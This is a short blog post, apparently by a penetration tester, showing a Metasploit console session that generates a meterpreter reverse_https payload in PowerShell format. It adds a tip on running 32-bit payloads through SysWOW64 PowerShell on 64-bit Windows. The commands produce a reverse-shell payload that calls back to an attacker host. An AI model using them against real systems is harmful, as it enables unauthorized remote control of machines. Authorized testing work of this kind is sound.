Monday, October 8, 2012

Metasploit and PowerShell payloads

Quick post, since i mentioned it in the DerbyCon talk, to mention that Metasploit generates PowerShell and PowerShell .net (looks related to this) payloads.

msf > use payload/windows/meterpreter/reverse_https
msf  payload(reverse_https) > set LHOST
msf  payload(reverse_https) > set LPORT 443
LPORT => 443
msf  payload(reverse_https) > generate -t psh -f https-pwrshell.txt
[*] Writing 3566 bytes to https-pwrshell.txt...
msf  payload(reverse_https) > 

Generates it based on old powersploit code here. Also a note to mention the 64 bit business I mentioned here still applies.  If you are on x64 you need to call the PowerShell in SYSWOW64 to run 32bit payloads.

PowerShell version

PowerShell .net version


No comments: